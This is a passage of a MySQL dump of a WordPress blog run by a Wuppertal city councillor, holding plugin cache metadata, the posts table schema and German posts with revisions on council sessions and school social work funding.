\"id\";i:289;}i:2;a:1:{s:2:\"id\";i:403;}}}}'),(771,386,'_wpas_done_all','1'),(780,339,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1448610030;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:176;}i:1;a:1:{s:2:\"id\";i:212;}i:2;a:1:{s:2:\"id\";i:245;}}}}'),(781,313,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1448615890;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:41;}i:1;a:1:{s:2:\"id\";i:233;}i:2;a:1:{s:2:\"id\";i:199;}}}}'),(784,71,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1448767403;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:199;}i:1;a:1:{s:2:\"id\";i:112;}i:2;a:1:{s:2:\"id\";i:189;}}}}'),(785,397,'_wp_attached_file','2015/11/120px-PIRATENsignet.png'),(786,397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:120;s:6:\"height\";i:120;s:4:\"file\";s:31:\"2015/11/120px-PIRATENsignet.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(787,398,'_edit_lock','1448748231:2'),(788,398,'_edit_last','2'),(789,398,'_sslider_expiry',''),(790,398,'_smooth_slider_style','default'),(791,400,'_wpas_done_all','1'),(792,400,'_tablepress_table_options','{\"last_editor\":2,\"table_head\":false,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),(793,400,'_tablepress_table_visibility','{\"rows\":[1,1,1,1],\"columns\":[1]}'),(794,398,'_wpas_done_all','1'),(797,398,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450859559;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:405;}i:1;a:1:{s:2:\"id\";i:35;}i:2;a:1:{s:2:\"id\";i:62;}}}}'),(798,88,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449950323;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:139;}i:1;a:1:{s:2:\"id\";i:413;}i:2;a:1:{s:2:\"id\";i:405;}}}}'),(799,403,'_edit_lock','1449135334:2'),(800,403,'_edit_last','2'),(801,403,'_wpas_done_all','1'),(804,403,'_sslider_expiry',''),(805,403,'_smooth_slider_style','default'),(806,403,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449478314;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:256;}i:1;a:1:{s:2:\"id\";i:245;}i:2;a:1:{s:2:\"id\";i:114;}}}}'),(807,269,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450837382;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:261;}i:1;a:1:{s:2:\"id\";i:114;}i:2;a:1:{s:2:\"id\";i:69;}}}}'),(808,405,'_edit_lock','1449167449:2'),(809,405,'_edit_last','2'),(810,405,'_sslider_expiry',''),(811,405,'_smooth_slider_style','default'),(812,35,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450220964;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:59;}i:1;a:1:{s:2:\"id\";i:331;}i:2;a:1:{s:2:\"id\";i:398;}}}}'),(813,405,'_wpas_done_all','1'),(816,405,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449985538;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:237;}i:1;a:1:{s:2:\"id\";i:157;}i:2;a:1:{s:2:\"id\";i:189;}}}}'),(817,240,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449211874;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:276;}i:1;a:1:{s:2:\"id\";i:216;}i:2;a:1:{s:2:\"id\";i:371;}}}}'),(818,212,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450647652;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:139;}i:1;a:1:{s:2:\"id\";i:339;}i:2;a:1:{s:2:\"id\";i:116;}}}}'),(819,98,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449488175;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:112;}i:1;a:1:{s:2:\"id\";i:398;}i:2;a:1:{s:2:\"id\";i:199;}}}}'),(820,233,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449614833;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:66;}i:1;a:1:{s:2:\"id\";i:256;}i:2;a:1:{s:2:\"id\";i:303;}}}}'),(821,413,'_edit_lock','1449771699:2'),(822,413,'_edit_last','2'),(823,413,'_sslider_expiry',''),(824,413,'_smooth_slider_style','default'),(825,413,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450995231;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:386;}i:1;a:1:{s:2:\"id\";i:403;}i:2;a:1:{s:2:\"id\";i:303;}}}}'),(826,413,'_wpas_done_all','1'),(831,324,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449850843;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:321;}i:1;a:1:{s:2:\"id\";i:276;}i:2;a:1:{s:2:\"id\";i:331;}}}}'),(832,283,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1449996433;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:331;}i:1;a:1:{s:2:\"id\";i:318;}i:2;a:1:{s:2:\"id\";i:116;}}}}'),(833,296,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450111461;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:386;}i:1;a:1:{s:2:\"id\";i:116;}i:2;a:1:{s:2:\"id\";i:318;}}}}'),(834,417,'_edit_lock','1450122410:2'),(835,417,'_edit_last','2'),(836,417,'_wpas_done_all','1'),(839,417,'_sslider_expiry',''),(840,417,'_smooth_slider_style','default'),(841,417,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1451213224;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:283;}i:1;a:1:{s:2:\"id\";i:339;}i:2;a:1:{s:2:\"id\";i:245;}}}}'),(842,276,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450539406;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:240;}i:1;a:1:{s:2:\"id\";i:66;}i:2;a:1:{s:2:\"id\";i:309;}}}}'),(843,318,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450627515;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:331;}i:1;a:1:{s:2:\"id\";i:413;}i:2;a:1:{s:2:\"id\";i:303;}}}}'),(844,139,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450681887;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:224;}i:1;a:1:{s:2:\"id\";i:88;}i:2;a:1:{s:2:\"id\";i:233;}}}}'),(845,18,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1450837634;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:303;}i:1;a:1:{s:2:\"id\";i:233;}i:2;a:1:{s:2:\"id\";i:245;}}}}'),(846,69,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1451236870;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:176;}i:1;a:1:{s:2:\"id\";i:245;}i:2;a:1:{s:2:\"id\";i:405;}}}}'),(847,254,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1451406134;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:43;}i:1;a:1:{s:2:\"id\";i:71;}i:2;a:1:{s:2:\"id\";i:240;}}}}'); /*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_posts` -- DROP TABLE IF EXISTS `wp_posts`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_posts` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `post_author` bigint(20) unsigned NOT NULL DEFAULT '0', `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL, `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL, `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish', `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open', `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open', `post_password` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL, `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL, `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0', `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `menu_order` int(11) NOT NULL DEFAULT '0', `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post', `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `comment_count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`ID`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`), KEY `post_name` (`post_name`(191)) ) ENGINE=InnoDB AUTO_INCREMENT=419 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_posts` -- LOCK TABLES `wp_posts` WRITE; /*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */; INSERT INTO `wp_posts` VALUES (2,2,'2014-11-07 21:30:37','2014-11-07 21:30:37','Was ich als Stadtverordneter erlebe und denke, will ich hier festhalten.\r\n','Politik in Wuppertal','','publish','open','closed','','sample-page','','','2015-05-06 08:03:39','2015-05-06 06:03:39','',0,'http://www.ollital.de/wordpress/?page_id=2',0,'page','',0),(5,2,'2014-11-07 21:54:21','2014-11-07 21:54:21','Nachdem ich viele Tutorials gelesen habe, habe ich es jetzt endlich geschafft, meinen eigenen Blog einzurichten.\r\n\r\nHier will ich Informationen aus meiner Ratsarbeit abseits vom Stammtisch veröffentlichen und auch archivieren.','Endlich geschafft','','publish','open','open','','endlich-geschafft','','','2014-11-08 10:30:15','2014-11-08 10:30:15','',0,'http://www.ollital.de/wordpress/?p=5',0,'post','',0),(6,2,'2014-11-07 21:53:32','2014-11-07 21:53:32','Nachdem ich viele Tutorials gelesen habe, habe ich es jetzt endlich geschafft, meinen eigenen Blog einzurichten.\r\n\r\nHier viel ich Informationen aus meiner Ratsarbeit abseits vom Stammtisch veröffentlichen und auch archivieren.\r\n\r\n ','Endlich geschafft','','inherit','open','open','','5-revision-v1','','','2014-11-07 21:53:32','2014-11-07 21:53:32','',5,'http://www.ollital.de/wordpress/?p=6',0,'revision','',0),(8,2,'2014-11-08 10:29:21','2014-11-08 10:29:21','Nachdem ich viele Tutorials gelesen habe, habe ich es jetzt endlich geschafft, meinen eigenen Blog einzurichten.\r\n\r\nHier will ich Informationen aus meiner Ratsarbeit abseits vom Stammtisch veröffentlichen und auch archivieren.\r\n\r\n ','Endlich geschafft','','inherit','open','open','','5-revision-v1','','','2014-11-08 10:29:21','2014-11-08 10:29:21','',5,'http://www.ollital.de/wordpress/?p=8',0,'revision','',0),(9,2,'2014-11-08 10:29:31','2014-11-08 10:29:31','Nachdem ich viele Tutorials gelesen habe, habe ich es jetzt endlich geschafft, meinen eigenen Blog einzurichten.\r\n\r\nHier will ich Informationen aus meiner Ratsarbeit abseits vom Stammtisch veröffentlichen und auch archivieren.','Endlich geschafft','','inherit','open','open','','5-revision-v1','','','2014-11-08 10:29:31','2014-11-08 10:29:31','',5,'http://www.ollital.de/wordpress/?p=9',0,'revision','',0),(10,2,'2014-11-10 18:03:06','2014-11-10 18:03:06','Ohne Anspruch auf Vollständigkeit:\r\n\r\nDas Rats-TV ist nach der Testphase in seinen Regelbetrieb übergegangen. Die Realisierung übernimmt nach Ausschreibung eine Firma aus Kassel.\r\n\r\nDer OB kündigt eine Überarbeitung der Hauptsatzung an, die den Wegfall der 5% Hürde berücksichtigt.\r\n\r\nDie 4. Fortschreibung des Haushaltsanierungsplans wurde beschlossen.\r\n\r\nDie Errichtung einer Bergischen Mehrzweckhalle wurde auf den Weg gebracht.\r\n\r\nStadtdirektor Meyer bekräftigt seine Aussage aus dem StaWiBau Ausschuss, dass eine Verlagerung des AZ nicht auf der Agenda steht.\r\n\r\nDas Berufskolleg Kothen wird zum 31.07.2015 als eigenständiges Berufskolleg aufgelöst.\r\n\r\nDer Beschluss über die bergische Zusammenarbeit wird auf die Dezembersitzung vertagt, da die Solinger noch Beratungsbedarf haben.\r\n\r\nBeim Redebeitrag von Gerd Wöll (Pro NRW) verließ beinah die komplette SPD-Fraktion den Saal.\r\n\r\n\r\n\r\n','Ratssitzung 10.11.2014','','publish','open','open','','ratssitzung-10-11-2014','','','2014-12-01 11:29:19','2014-12-01 10:29:19','',0,'http://www.ollital.de/wordpress/?p=10',0,'post','',0),(11,2,'2014-11-10 18:03:06','2014-11-10 18:03:06','Das Rats-TV ist nach der Testphase in seinen Regelbetrieb übergegangen. Die Realisierung übernimmt nach Ausschreibung eine Firma aus Kassel.\r\n\r\nDer OB kündigt eine Überarbeitung der GO an, die den Wegfall der 5% Hürde berücksichtigt.\r\n\r\nDie 4. Fortschreibung des Haushaltsanierungsplans wurde beschlossen.\r\n\r\nDie Errichtung einer Bergischen Mehrzweckhalle wurde auf den Weg gebracht.\r\n\r\nStadtdirektor Meyer bekräftigt seine Aussage aus dem StaWiBau Ausschuss, dass eine Verlagerung des AZ nicht auf der Agenda steht.\r\n\r\nDas Berufskolleg Kothen wird zum 31.07.2015 als eigenständiges Berufskolleg aufgelöst.\r\n\r\nDer Beschluss über die bergische Zusammenarbeit wird auf die Dezembersitzung vertagt, da die Solinger noch Beratungsbedarf haben.\r\n\r\n\r\n\r\n','Ratssitzung 10.11.2014','','inherit','open','open','','10-revision-v1','','','2014-11-10 18:03:06','2014-11-10 18:03:06','',10,'http://www.ollital.de/wordpress/?p=11',0,'revision','',0),(12,2,'2014-11-10 20:52:58','2014-11-10 20:52:58','Das Rats-TV ist nach der Testphase in seinen Regelbetrieb übergegangen. Die Realisierung übernimmt nach Ausschreibung eine Firma aus Kassel.\n\nDer OB kündigt eine Überarbeitung der GO an, die den Wegfall der 5% Hürde berücksichtigt.\n\nDie 4. Fortschreibung des Haushaltsanierungsplans wurde beschlossen.\n\nDie Errichtung einer Bergischen Mehrzweckhalle wurde auf den Weg gebracht.\n\nStadtdirektor Meyer bekräftigt seine Aussage aus dem StaWiBau Ausschuss, dass eine Verlagerung des AZ nicht auf der Agenda steht.\n\nDas Berufskolleg Kothen wird zum 31.07.2015 als eigenständiges Berufskolleg aufgelöst.\n\nDer Beschluss über die bergische Zusammenarbeit wird auf die Dezembersitzung vertagt, da die Solinger noch Beratungsbedarf haben.\n\nBeim Redebeitrag von Gerd Wöll (Pro NRW) verließ beinah die komplette SPD-Fraktion den Saal.\n\n\n\n','Ratssitzung 10.11.2014','','inherit','open','open','','10-autosave-v1','','','2014-11-10 20:52:58','2014-11-10 20:52:58','',10,'http://www.ollital.de/wordpress/?p=12',0,'revision','',0),(13,2,'2014-11-10 20:53:33','2014-11-10 20:53:33','Ohne Anspruch auf Vollständigkeit:\r\n\r\nDas Rats-TV ist nach der Testphase in seinen Regelbetrieb übergegangen. Die Realisierung übernimmt nach Ausschreibung eine Firma aus Kassel.\r\n\r\nDer OB kündigt eine Überarbeitung der GO an, die den Wegfall der 5% Hürde berücksichtigt.\r\n\r\nDie 4. Fortschreibung des Haushaltsanierungsplans wurde beschlossen.\r\n\r\nDie Errichtung einer Bergischen Mehrzweckhalle wurde auf den Weg gebracht.\r\n\r\nStadtdirektor Meyer bekräftigt seine Aussage aus dem StaWiBau Ausschuss, dass eine Verlagerung des AZ nicht auf der Agenda steht.\r\n\r\nDas Berufskolleg Kothen wird zum 31.07.2015 als eigenständiges Berufskolleg aufgelöst.\r\n\r\nDer Beschluss über die bergische Zusammenarbeit wird auf die Dezembersitzung vertagt, da die Solinger noch Beratungsbedarf haben.\r\n\r\nBeim Redebeitrag von Gerd Wöll (Pro NRW) verließ beinah die komplette SPD-Fraktion den Saal.\r\n\r\n\r\n\r\n','Ratssitzung 10.11.2014','','inherit','open','open','','10-revision-v1','','','2014-11-10 20:53:33','2014-11-10 20:53:33','',10,'http://www.ollital.de/wordpress/?p=13',0,'revision','',0),(14,2,'2014-11-12 10:13:03','2014-11-12 10:13:03','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n
                                                                Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)
                                                                \n\n...or something like this:\n\n
                                                                The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.
                                                                \n\nAs a new WordPress user, you should go to your dashboard to delete this page and create new pages for your content. Have fun!','Politik in Wuppertal und anderes','','inherit','open','open','','2-revision-v1','','','2014-11-12 10:13:03','2014-11-12 10:13:03','',2,'http://www.ollital.de/wordpress/?p=14',0,'revision','',0),(18,2,'2014-11-13 22:02:25','2014-11-13 21:02:25','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit aussprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','publish','open','open','','schulsozialarbeit','','','2014-11-14 13:12:55','2014-11-14 12:12:55','',0,'http://www.ollital.de/wordpress/?p=18',0,'post','',0),(19,2,'2014-11-13 21:56:16','2014-11-13 20:56:16','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. http://www.wz-newsline.de/lokales/wuppertal/hoffnung-auf-fortsetzung-der-schulsozialarbeit-1.1788611\r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 21:56:16','2014-11-13 20:56:16','',18,'http://www.ollital.de/wordpress/?p=19',0,'revision','',0),(20,2,'2014-11-13 21:58:59','2014-11-13 20:58:59','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann. \r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 21:58:59','2014-11-13 20:58:59','',18,'http://www.ollital.de/wordpress/?p=20',0,'revision','',0),(21,2,'2014-11-13 21:59:44','2014-11-13 20:59:44','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen \r\n bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann. \r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 21:59:44','2014-11-13 20:59:44','',18,'http://www.ollital.de/wordpress/?p=21',0,'revision','',0),(22,2,'2014-11-13 22:00:09','2014-11-13 21:00:09','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen \r\nPressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann. \r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:00:09','2014-11-13 21:00:09','',18,'http://www.ollital.de/wordpress/?p=22',0,'revision','',0),(23,2,'2014-11-13 22:00:41','2014-11-13 21:00:41','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:00:41','2014-11-13 21:00:41','',18,'http://www.ollital.de/wordpress/?p=23',0,'revision','',0),(24,2,'2014-11-13 22:02:55','2014-11-13 21:02:55','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 durch Einsparungen im Haushalt fortgeführt werden kann.http://www.spdrat.de/SpdPress/read/1077\r\nZu der Mitteilung muss richtig gestellt werden, dass die kleineren Parteien im Rat den Haushaltssanierungsplan abgelehnt haben, weil die Schulsozialarbeit dort nicht erwähnt wird. Hätte die Kooperation in der Ratssitzung bereits die heutige Mitteilung gemacht, wäre die Abstimmung mit Sicherheit anders ausgefallen. \r\nDa es mir in erster Linie um die Sache geht, begrüsse ich die heutige Entscheidung sehr, stelle aber schonmal die Frage nach der Finanzierung über 2015 hinaus.\r\nDie Schulsozialarbeiter wochenlang zappeln zu lassen und sich dann mediengeil als Retter der Schulsozialarbeit aufzuspielen halte ich für äusserst schlechten Stil.\r\nÜbrigens habe ich weder Müller noch Reese auf der Demo zum Erhalt der Schulsozialarbeit gesehen.\r\n','Schulsozialarbeit','','inherit','open','open','','18-revision-v1','','','2014-11-13 22:02:55','2014-11-13 21:02:55','',18,'http://www.ollital.de/wordpress/?p=24',0,'revision','',0),(26,2,'2014-11-13 22:06:53','2014-11-13 21:06:53','Nachdem sich die CDU in der letzten Ratssitzung sich überraschend für den Erhalt der Schulsozialarbeit ausaprach, gaben CDU und SPD in einer gemeinsamen âhref=\'http://www.spdrat.de/SpdPress/read/1077\'>Pressemitteilung bekannt, dass die Schulsozialarbeit im Jahr 2015 